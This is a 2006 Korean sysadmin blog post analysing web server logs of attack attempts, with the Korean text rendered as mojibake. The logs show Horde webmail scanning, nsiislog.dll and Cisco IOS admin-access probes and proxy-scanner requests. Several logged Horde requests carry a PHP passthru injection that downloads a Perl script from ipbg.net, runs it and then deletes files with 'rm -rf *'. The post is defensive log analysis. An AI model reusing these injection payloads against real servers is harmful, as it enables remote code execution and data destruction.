Ä¿ÇǴнº, ½Ã½ºÅÛ ¿£Áö´Ï¾îÀÇ ½°ÅÍ Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
* HanIRCÀÇ #coffeenix ¹æ
[ Àåºñ ¹× ȸ¼± ÈÄ¿ø ]
HOME > ³×Æ®¿öÅ©(network) > À¥ ¼­¹ö(web, httpd, apache) µµ¿ò¸»
°Ë»ö : »çÀÌÆ® WHOIS À¥¼­¹ö Á¾·ù

WebDAV (7, ±Û 1, ÀÚ·á 4)
À¥¼­¹ö Æ©´× (5, ±Û 4, ÀÚ·á 2)
À¥¼­¹ö »ç¿ë Åë°è ÀÚ·á (2, ÀÚ·á 1)
Apache SSL / mod_ssl (4, ±Û 3, ÀÚ·á 2)

  À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé 2¹ø° ÀÛ¼ºÀÏ : 2006/10/17 20:19
 
  • ±Û¾´ÀÌ : ÁÁÀºÁøÈ£ ( http://coffeenix.net/ )
  • Á¶È¸¼ö : 9204
          [ ÀÌÀüÈ­¸é / ¼öÁ¤ ]   ºñ¹Ð¹øÈ£ :     Àμâ¿ë È­¸é
      Á¦  ¸ñ : À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé 2¹ø°
    ÀÛ¼ºÀÚ : ÁÁÀºÁøÈ£(truefeel, http://coffeenix.net/ )
    ÀÛ¼ºÀÏ : 2006.5.25(¸ñ)~
    Á¤¸®ÀÏ : 2006.9.18(¿ù)

    'À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé'¿¡ ÀÌÀº 2¹ø° À¥·Î±× ºÐ¼®(?) °á°úÀÌ´Ù. ³Ê¹«³ªµµ ¸¹Àº À¯ÇüÀÇ À¥°ø°Ý ·Î±×°¡
    ±×µ¿¾È ³²¾ÒÁö¸¸ ¸íÈ®ÇÏ°Ô ºÐ¼®Çϱâ Èûµç(°ü·Ã ÀڷḦ ã¾Æº¼ ¼ö ¾ø´Â) »óȲÀÌ´Ù. ÀÌ·± ½ÃÁ¡¿¡
    ¸ðµç ·Î±×¸¦ ºÐ¼® Á¤¸®ÇÏ´Â °ÍÀº ºÒ°¡´ÉÇÑ °ÍÀº ´ç¿¬ÇÏ°í, ´õ ¸¹Àº ºÐ¼® °á°ú¸¦ Á¦°øÇÏ·Á°í ÇÏ´Ù°¡´Â
    ³Ê¹«³ª ½ÃÁ¡ÀÌ ´Ê¾îÁú °Í °°¾Æ ÀÏºÎ¶óµµ Á¤¸®Çß´Ù. ±âÁ¸¿¡ ±â·ÏµÈ ·Î±×Áß ¾î¶² °ø°Ý½ÃµµÀÎÁö ÆľÇÀÌ
    µÇ¸é À̱ۿ¡ Ãß°¡Çϵµ·Ï ÇÏ°Ú´Ù.
    À¥°ø°ÝÀÌ ÀÖÀ» ¶§ ½ÇÁ¦ ÇØÅ·À» ´çÇßÀ» °¡´É¼º ¿©ºÎ´Â ÀÌÀü¿¡ ½è´ø ±ÛÀ» Àо±â ¹Ù¶õ´Ù.
    http://coffeenix.net/board_view.php?bd_code=1352

    ¡Ø ÀÌ ±Û ¸¸Å­Àº MSIE¿¡¼­ Å×À̺íÀÌ °¡Àå Àß Ç¥½ÃµË´Ï´Ù.

    1. ½Ã½ºÅÛ ¸ð´ÏÅ͸µ Åø What's UpÀÌ ³²±ä ·Î±×

     
    210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
    210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
     


    - À©µµ±â¹ÝÀÇ »ó¿ë ¸ð´ÏÅ͸µ ÅøÀÎ What's UpÀÌ À¥¼­¹ö°¡ »ì¾ÆÀÖ´ÂÁö üũÇϱâ À§ÇØ Á¢¼ÓÇÑ ·Î±×ÀÌ´Ù.

    Âü°íÀÚ·á :
    * WhatsUp ȨÆäÀÌÁö
      http://www.ipswitch.com/products/whatsup/index.asp

    2. ¿ÀǼҽº±â¹Ý À¥¸ÞÀÏ Horde Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


     
    216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


     
    196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : ¿¡Äâµµ¸£ (RC, 201.219.7.0/24)
           ¹Ì±¹ (216.65.0.0 - 216.65.127.255)
           ÄÚ½ºÅ¸¸®Ä«(CR, 196.40.85.128/25)

    Âü°í ÀÚ·á :

    3. À©µµ ¹Ìµð¼­ ¼­ºñ½º ISAPI nsiislog.dll POST ¿À¹öÇ÷οì Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
    202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
     


    - IP : Áß±¹(CN, 202.100.96.0 - 202.100.127.255)
    - 2003³â 6¿ù¿¡ ³ª¿Â Ãë¾àÁ¡À̸ç, Windows 2000¼­¹ö¿¡ ÇØ´çµÈ´Ù.
      80Æ÷Æ®·Î 'GET /scripts/nsiislog.dll /HTTP/1.0' ¸¦ ¿äûÇßÀ» ¶§ ¼­¹ö¿¡¼­ 'NetShow ISAPI Log Dll'
      °ªÀ» »Ñ·ÁÁشٸé Ãë¾àÁ¡ÀÌ ÀÖ´Â ½Ã½ºÅÛÀÌ´Ù.

    Âü°íÀÚ·á :
    * Microsoft Media Services ISAPI nsiislog.dll POST Overflow
      http://www.osvdb.org/4535
    * Windows Media Services Remote Command Execution #2
      http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
    * Successful attack using MS03-022 vuln
      http://lists.sans.org/pipermail/unisog/2003-September/022422.html

    4. proxy_scanner ÅøÀ» ÀÌ¿ëÇÑ Proxy scanning ·Î±×

     
    211.100.xx.xx - - [06/Jun/2006:21:17:38 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
    61.135.xxx.xxx - - [06/Jun/2006:23:43:32 +0900] "GET http://check.211.xxx.xxx.xx.v.80.PCN22.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
    211.100.xx.xx - - [02/Jul/2006:09:37:52 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
     


    - IP : Áß±¹ (CN, 211.100.32.0 - 211.100.95.255)
           Áß±¹ (CN, 61.135.0.0 - 61.135.255.255)
    - 2004³â¿¡ Áß±¹ ÇØÄ¿¿¡ ÀÇÇØ ¸±¸®ÁîµÈ Proxy Scanning Åø 'proxy_scanner'À» ÀÌ¿ëÇؼ­ Proxy »ç¿ë
      °¡´É¿©ºÎ¸¦ È®ÀÎÇϱâ À§ÇÑ ¿äûÀÌ´Ù.
    - URL ¿äû Çü½ÄÀº ´ÙÀ½°ú °°´Ù.
      http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
      check...super.proxy.scanner.(i.thu.cn|ii.9966.org)ÀÇ È£½ºÆ®´Â ¸ðµÎ 61.135.170.153 IP·Î lookupµÇ´Â
      °ÍÀ¸·Î º¸¾Æ ¸î¸î IP(DNSµî)¸¸ Á¦¿ÜÇÏ°í '* IN A 61.135.170.153'À¸·Î DNS ¼³Á¤µÇ¾î ÀÖ´Â °ÍÀ¸·Î º¸ÀδÙ.
    - ÀÌ µé À¥¼­¹ö´Â lighttpd/1.4.11À» »ç¿ëÇÑ´Ù. (80Æ÷Æ®·Î telnetÇؼ­ º¸¸é ½±°Ô È®ÀÎ °¡´É)

    Âü°íÀÚ·á :
    * What's a super.proxy.scanner and why is it in my logs?
      http://isc.sans.org/diary.php?storyid=1298
    * Proxy Probes
      http://www.splunk.com/splunkbin/426

    5. Cisco ISO HTTPÀ» ÅëÇØ admin ±ÇÇÑÀ» °®À» ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
     


    - IP : ½º¿þµ§(SE, 81.224.0.0 - 81.236.255.255)
    - ÀÌÀü À¥·Î±× ºÐ¼® ±ÛÀÇ '14. Cisco SwitchÀÇ ¾ÆÁÖ ¿¹Àü HTTP Ãë¾àÁ¡(2001³â)À» ÀÌ¿ëÇÑ °ø°Ý'
      Ç׸ñÀ» Âü°íÇϱ⠹ٶõ´Ù.
    - ÀÌ Ãë¾àÁ¡Àº http://Switch_IP/level/$NUMBER/exec/.... URLÀ» ÀÌ¿ëÇؼ­ full admin±ÇÇÑÀ» °®À»
      ¼ö ÀÖÀ¸¸ç /level/$NUMBER/exec/... ¿¡¼­ $NUMBER´Â 16¿¡¼­ 99»çÀÇ ¼ýÀÚÀÌ´Ù.
    - Cisco Global Exploiter¶ó´Â ÀÚµ¿È­µÈ ÅøÀ» ÀÌ¿ëÇؼ­ CISCOÀÇ Ãë¾àÁ¡À» ½ºÄ³´×ÇÏ´Â ÅøÀÌ ÀÖ´Ù.

    Âü°í ÀÚ·á :
    * Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
      http://www.securityfocus.com/bid/2936
    * Multiple Cisco Exploit Codes
      http://www.securiteam.com/exploits/5OP0L1FCAE.html
      http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl

      Ä¿ÇǴнº Ä«Æä ÃÖ±Ù ±Û
    [03/24] Youtube òÁ&#2
    [03/20] Re: ¿Â¶óÀΰÔÀÓÀÇ Á¾ÁÖ±¹ ´ëÇѹα¹
    [03/20] ½ÇÁ¦&#4
    [03/18] ±¹°¡&#5
    [10/20] Cross Compiler ±ò
    [07/14] SSL ¬¡¬°
    [04/26] Re: µµ½ºÈ­¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
    [04/25] µµ½ºÈ­¸é ¿ø°ÝÁ¶Á¾ ¿©ºÎ
    [10/30] Cshell¿¡¼­ ³­¼ö ¼³Á¤
    [10/23] °øÇ×öµµÁÖ½Äȸ»ç SE ±¸ÀÎ Ëì
    [01/26] Re: wgetÀ¸·Î ´Ù¸¥¼­¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
    [01/25] wgetÀ¸·Î ´Ù¸¥¼­¹ö¿¡ÀÖ´Â µð·ºÅ丮¸¦ °¡Á®¿À·Á°íÇÕ´Ï´Ù.
    [01/11] ƯÁ¤ ¾Èµå·ÎÀ̵å WebView ¹öÀü¿¡¼­ SSL ¹®Á¦ (WebView ¹ö±×)
    [08/01] DNS forwarder (Àü´ÞÀÚ) ¼­¹ö¸¦ ÅëÇؼ­ Äõ¸®ÇÏ¸é ¿ª¹æÇâÀ» ¹Þ¾Æ¿ÀÁú ¸øÇÕ´Ï´Ù.
    [05/16] (ÁÖ)ÈÄÀÌÁî ½Ã½ºÅÛ¿£Áö´Ï¾î (°æ·ÂÀÚ) ¸ðÁý
      New!   ÃÖ±Ù¿¡ µî·ÏÇÑ ÆäÀÌÁö
      KiCad EDA Suite project (Free/Libre/Open-Source EDA Suite) (CAD)
      ¿ÀÇÂij½ºÄÉÀ̵å ijµå (OpenCASCADE CAD)
      QCad for Windows --- GNU GPL (Free Software)
      The Hello World Collection
      IPMI¸¦ È°¿ëÇÑ ¸®´ª½º ¼­¹ö°ü¸®
      DNS ¼³Á¤ °Ë»ç
      nagiosgraph ¼³Ä¡ ¹æ¹ý
      Slony-I ¼³Ä¡ ¹æ¹ý (postgresql replication tool)
      Qmail±â¹ÝÀÇ Anti spam ½Ã½ºÅÛ ±¸ÃàÇϱâ
      clusterssh

    [ ÇÔ²²ÇÏ´Â »çÀÌÆ® ]




    ¿î¿µÁø : ÁÁÀºÁøÈ£(truefeel), ¾ß¼ö(yasu), ¹ü³ÃÀÌ, sCag
    2003³â 8¿ù 4ÀÏ~